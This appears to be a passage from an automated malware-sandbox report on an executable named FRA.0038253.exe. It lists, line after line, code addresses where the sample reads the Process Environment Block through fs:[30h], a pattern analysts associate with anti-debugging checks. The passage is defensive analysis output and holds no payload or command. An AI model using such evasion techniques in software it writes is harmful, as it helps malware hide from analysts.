        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E56E0 mov eax, dword ptr fs:[00000030h]3_2_356E56E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E56E0 mov eax, dword ptr fs:[00000030h]3_2_356E56E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E56E0 mov eax, dword ptr fs:[00000030h]3_2_356E56E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357756E0 mov eax, dword ptr fs:[00000030h]3_2_357756E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357756E0 mov eax, dword ptr fs:[00000030h]3_2_357756E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357836E0 mov eax, dword ptr fs:[00000030h]3_2_357836E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357836E0 mov eax, dword ptr fs:[00000030h]3_2_357836E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357836E0 mov eax, dword ptr fs:[00000030h]3_2_357836E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357836E0 mov eax, dword ptr fs:[00000030h]3_2_357836E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357836E0 mov eax, dword ptr fs:[00000030h]3_2_357836E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570D6D0 mov eax, dword ptr fs:[00000030h]3_2_3570D6D0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3575D69D mov eax, dword ptr fs:[00000030h]3_2_3575D69D
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F68C mov eax, dword ptr fs:[00000030h]3_2_3579F68C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3573717A mov eax, dword ptr fs:[00000030h]3_2_3573717A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3573717A mov eax, dword ptr fs:[00000030h]3_2_3573717A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571716D mov eax, dword ptr fs:[00000030h]3_2_3571716D
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357B3157 mov eax, dword ptr fs:[00000030h]3_2_357B3157
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357B3157 mov eax, dword ptr fs:[00000030h]3_2_357B3157
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357B3157 mov eax, dword ptr fs:[00000030h]3_2_357B3157
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357B5149 mov eax, dword ptr fs:[00000030h]3_2_357B5149
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577D140 mov eax, dword ptr fs:[00000030h]3_2_3577D140
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577D140 mov eax, dword ptr fs:[00000030h]3_2_3577D140
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577314A mov eax, dword ptr fs:[00000030h]3_2_3577314A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577314A mov eax, dword ptr fs:[00000030h]3_2_3577314A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577314A mov eax, dword ptr fs:[00000030h]3_2_3577314A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577314A mov eax, dword ptr fs:[00000030h]3_2_3577314A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F13E mov eax, dword ptr fs:[00000030h]3_2_3579F13E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35717128 mov eax, dword ptr fs:[00000030h]3_2_35717128
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35717128 mov eax, dword ptr fs:[00000030h]3_2_35717128
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E510D mov eax, dword ptr fs:[00000030h]3_2_356E510D
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DF113 mov eax, dword ptr fs:[00000030h]3_2_356DF113
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570510F mov eax, dword ptr fs:[00000030h]3_2_3570510F
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570F1F0 mov eax, dword ptr fs:[00000030h]3_2_3570F1F0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570F1F0 mov eax, dword ptr fs:[00000030h]3_2_3570F1F0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577D1F0 mov eax, dword ptr fs:[00000030h]3_2_3577D1F0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E91E5 mov eax, dword ptr fs:[00000030h]3_2_356E91E5
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E91E5 mov eax, dword ptr fs:[00000030h]3_2_356E91E5
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570B1E0 mov eax, dword ptr fs:[00000030h]3_2_3570B1E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570B1E0 mov eax, dword ptr fs:[00000030h]3_2_3570B1E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570B1E0 mov eax, dword ptr fs:[00000030h]3_2_3570B1E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570B1E0 mov eax, dword ptr fs:[00000030h]3_2_3570B1E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570B1E0 mov eax, dword ptr fs:[00000030h]3_2_3570B1E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570B1E0 mov eax, dword ptr fs:[00000030h]3_2_3570B1E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570B1E0 mov eax, dword ptr fs:[00000030h]3_2_3570B1E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D91F0 mov eax, dword ptr fs:[00000030h]3_2_356D91F0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D91F0 mov eax, dword ptr fs:[00000030h]3_2_356D91F0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F51C0 mov eax, dword ptr fs:[00000030h]3_2_356F51C0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F51C0 mov eax, dword ptr fs:[00000030h]3_2_356F51C0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F51C0 mov eax, dword ptr fs:[00000030h]3_2_356F51C0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F51C0 mov eax, dword ptr fs:[00000030h]3_2_356F51C0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357B51B6 mov eax, dword ptr fs:[00000030h]3_2_357B51B6
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357131BE mov eax, dword ptr fs:[00000030h]3_2_357131BE
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357131BE mov eax, dword ptr fs:[00000030h]3_2_357131BE
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35721190 mov eax, dword ptr fs:[00000030h]3_2_35721190
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35721190 mov eax, dword ptr fs:[00000030h]3_2_35721190
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35709194 mov eax, dword ptr fs:[00000030h]3_2_35709194
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35789060 mov eax, dword ptr fs:[00000030h]3_2_35789060
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E7072 mov eax, dword ptr fs:[00000030h]3_2_356E7072
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357B505B mov eax, dword ptr fs:[00000030h]3_2_357B505B
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E1051 mov eax, dword ptr fs:[00000030h]3_2_356E1051
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E1051 mov eax, dword ptr fs:[00000030h]3_2_356E1051
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DD02D mov eax, dword ptr fs:[00000030h]3_2_356DD02D
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35705004 mov eax, dword ptr fs:[00000030h]3_2_35705004
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35705004 mov ecx, dword ptr fs:[00000030h]3_2_35705004
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571D0F0 mov eax, dword ptr fs:[00000030h]3_2_3571D0F0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571D0F0 mov ecx, dword ptr fs:[00000030h]3_2_3571D0F0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D90F8 mov eax, dword ptr fs:[00000030h]3_2_356D90F8
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D90F8 mov eax, dword ptr fs:[00000030h]3_2_356D90F8
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D90F8 mov eax, dword ptr fs:[00000030h]3_2_356D90F8
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D90F8 mov eax, dword ptr fs:[00000030h]3_2_356D90F8
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB0D6 mov eax, dword ptr fs:[00000030h]3_2_356DB0D6
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB0D6 mov eax, dword ptr fs:[00000030h]3_2_356DB0D6
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB0D6 mov eax, dword ptr fs:[00000030h]3_2_356DB0D6
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB0D6 mov eax, dword ptr fs:[00000030h]3_2_356DB0D6
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FB0D0 mov eax, dword ptr fs:[00000030h]3_2_356FB0D0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357B50B7 mov eax, dword ptr fs:[00000030h]3_2_357B50B7
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579B0AF mov eax, dword ptr fs:[00000030h]3_2_3579B0AF
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F0A5 mov eax, dword ptr fs:[00000030h]3_2_3578F0A5
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F0A5 mov eax, dword ptr fs:[00000030h]3_2_3578F0A5
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F0A5 mov eax, dword ptr fs:[00000030h]3_2_3578F0A5
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F0A5 mov eax, dword ptr fs:[00000030h]3_2_3578F0A5
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F0A5 mov eax, dword ptr fs:[00000030h]3_2_3578F0A5
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F0A5 mov eax, dword ptr fs:[00000030h]3_2_3578F0A5
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578F0A5 mov eax, dword ptr fs:[00000030h]3_2_3578F0A5
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35767090 mov eax, dword ptr fs:[00000030h]3_2_35767090
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EB360 mov eax, dword ptr fs:[00000030h]3_2_356EB360
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EB360 mov eax, dword ptr fs:[00000030h]3_2_356EB360
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EB360 mov eax, dword ptr fs:[00000030h]3_2_356EB360
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EB360 mov eax, dword ptr fs:[00000030h]3_2_356EB360
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EB360 mov eax, dword ptr fs:[00000030h]3_2_356EB360
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356EB360 mov eax, dword ptr fs:[00000030h]3_2_356EB360
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357B3336 mov eax, dword ptr fs:[00000030h]3_2_357B3336
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570332D mov eax, dword ptr fs:[00000030h]3_2_3570332D
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D9303 mov eax, dword ptr fs:[00000030h]3_2_356D9303
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D9303 mov eax, dword ptr fs:[00000030h]3_2_356D9303
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F30A mov eax, dword ptr fs:[00000030h]3_2_3579F30A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576330C mov eax, dword ptr fs:[00000030h]3_2_3576330C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576330C mov eax, dword ptr fs:[00000030h]3_2_3576330C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576330C mov eax, dword ptr fs:[00000030h]3_2_3576330C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576330C mov eax, dword ptr fs:[00000030h]3_2_3576330C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357133D0 mov eax, dword ptr fs:[00000030h]3_2_357133D0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E93A6 mov eax, dword ptr fs:[00000030h]3_2_356E93A6
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E93A6 mov eax, dword ptr fs:[00000030h]3_2_356E93A6
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35781390 mov eax, dword ptr fs:[00000030h]3_2_35781390
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35781390 mov eax, dword ptr fs:[00000030h]3_2_35781390
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E1380 mov eax, dword ptr fs:[00000030h]3_2_356E1380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E1380 mov eax, dword ptr fs:[00000030h]3_2_356E1380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E1380 mov eax, dword ptr fs:[00000030h]3_2_356E1380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E1380 mov eax, dword ptr fs:[00000030h]3_2_356E1380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E1380 mov eax, dword ptr fs:[00000030h]3_2_356E1380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FF380 mov eax, dword ptr fs:[00000030h]3_2_356FF380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FF380 mov eax, dword ptr fs:[00000030h]3_2_356FF380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FF380 mov eax, dword ptr fs:[00000030h]3_2_356FF380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FF380 mov eax, dword ptr fs:[00000030h]3_2_356FF380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FF380 mov eax, dword ptr fs:[00000030h]3_2_356FF380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FF380 mov eax, dword ptr fs:[00000030h]3_2_356FF380
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F38A mov eax, dword ptr fs:[00000030h]3_2_3579F38A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579D270 mov eax, dword ptr fs:[00000030h]3_2_3579D270
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577327E mov eax, dword ptr fs:[00000030h]3_2_3577327E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577327E mov eax, dword ptr fs:[00000030h]3_2_3577327E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577327E mov eax, dword ptr fs:[00000030h]3_2_3577327E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577327E mov eax, dword ptr fs:[00000030h]3_2_3577327E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577327E mov eax, dword ptr fs:[00000030h]3_2_3577327E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3577327E mov eax, dword ptr fs:[00000030h]3_2_3577327E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB273 mov eax, dword ptr fs:[00000030h]3_2_356DB273
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB273 mov eax, dword ptr fs:[00000030h]3_2_356DB273
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DB273 mov eax, dword ptr fs:[00000030h]3_2_356DB273
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3575D250 mov eax, dword ptr fs:[00000030h]3_2_3575D250
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3575D250 mov ecx, dword ptr fs:[00000030h]3_2_3575D250
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A124C mov eax, dword ptr fs:[00000030h]3_2_357A124C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A124C mov eax, dword ptr fs:[00000030h]3_2_357A124C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A124C mov eax, dword ptr fs:[00000030h]3_2_357A124C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A124C mov eax, dword ptr fs:[00000030h]3_2_357A124C
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3570F24A mov eax, dword ptr fs:[00000030h]3_2_3570F24A
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F247 mov eax, dword ptr fs:[00000030h]3_2_3579F247
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576B214 mov eax, dword ptr fs:[00000030h]3_2_3576B214
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3576B214 mov eax, dword ptr fs:[00000030h]3_2_3576B214
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DD2EC mov eax, dword ptr fs:[00000030h]3_2_356DD2EC
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DD2EC mov eax, dword ptr fs:[00000030h]3_2_356DD2EC
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D72E0 mov eax, dword ptr fs:[00000030h]3_2_356D72E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357832DF mov eax, dword ptr fs:[00000030h]3_2_357832DF
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357832DF mov eax, dword ptr fs:[00000030h]3_2_357832DF
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357832DF mov eax, dword ptr fs:[00000030h]3_2_357832DF
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357832DF mov eax, dword ptr fs:[00000030h]3_2_357832DF
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357832DF mov eax, dword ptr fs:[00000030h]3_2_357832DF
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357B32C9 mov eax, dword ptr fs:[00000030h]3_2_357B32C9
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357032C5 mov eax, dword ptr fs:[00000030h]3_2_357032C5
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D92AF mov eax, dword ptr fs:[00000030h]3_2_356D92AF
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357BB2BC mov eax, dword ptr fs:[00000030h]3_2_357BB2BC
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357BB2BC mov eax, dword ptr fs:[00000030h]3_2_357BB2BC
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357BB2BC mov eax, dword ptr fs:[00000030h]3_2_357BB2BC
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357BB2BC mov eax, dword ptr fs:[00000030h]3_2_357BB2BC
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A92AB mov eax, dword ptr fs:[00000030h]3_2_357A92AB
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579F2AE mov eax, dword ptr fs:[00000030h]3_2_3579F2AE
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E7290 mov eax, dword ptr fs:[00000030h]3_2_356E7290
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E7290 mov eax, dword ptr fs:[00000030h]3_2_356E7290
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E7290 mov eax, dword ptr fs:[00000030h]3_2_356E7290
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571BD71 mov eax, dword ptr fs:[00000030h]3_2_3571BD71
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571BD71 mov eax, dword ptr fs:[00000030h]3_2_3571BD71
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356F5D60 mov eax, dword ptr fs:[00000030h]3_2_356F5D60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35765D60 mov eax, dword ptr fs:[00000030h]3_2_35765D60
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357B5D65 mov eax, dword ptr fs:[00000030h]3_2_357B5D65
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FDD4D mov eax, dword ptr fs:[00000030h]3_2_356FDD4D
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FDD4D mov eax, dword ptr fs:[00000030h]3_2_356FDD4D
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356FDD4D mov eax, dword ptr fs:[00000030h]3_2_356FDD4D
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35761D5E mov eax, dword ptr fs:[00000030h]3_2_35761D5E
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D9D46 mov eax, dword ptr fs:[00000030h]3_2_356D9D46
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D9D46 mov eax, dword ptr fs:[00000030h]3_2_356D9D46
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356D9D46 mov ecx, dword ptr fs:[00000030h]3_2_356D9D46
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A5D43 mov eax, dword ptr fs:[00000030h]3_2_357A5D43
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357A5D43 mov eax, dword ptr fs:[00000030h]3_2_357A5D43
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E1D50 mov eax, dword ptr fs:[00000030h]3_2_356E1D50
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356E1D50 mov eax, dword ptr fs:[00000030h]3_2_356E1D50
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3571BD37 mov eax, dword ptr fs:[00000030h]3_2_3571BD37
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_356DFD20 mov eax, dword ptr fs:[00000030h]3_2_356DFD20
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579BD08 mov eax, dword ptr fs:[00000030h]3_2_3579BD08
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3579BD08 mov eax, dword ptr fs:[00000030h]3_2_3579BD08
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35783D00 mov eax, dword ptr fs:[00000030h]3_2_35783D00
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35783D00 mov eax, dword ptr fs:[00000030h]3_2_35783D00
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578FDF4 mov eax, dword ptr fs:[00000030h]3_2_3578FDF4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578FDF4 mov eax, dword ptr fs:[00000030h]3_2_3578FDF4
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_3578FDF4 mov eax, dword ptr fs:[00000030h]3_2_3578FDF4
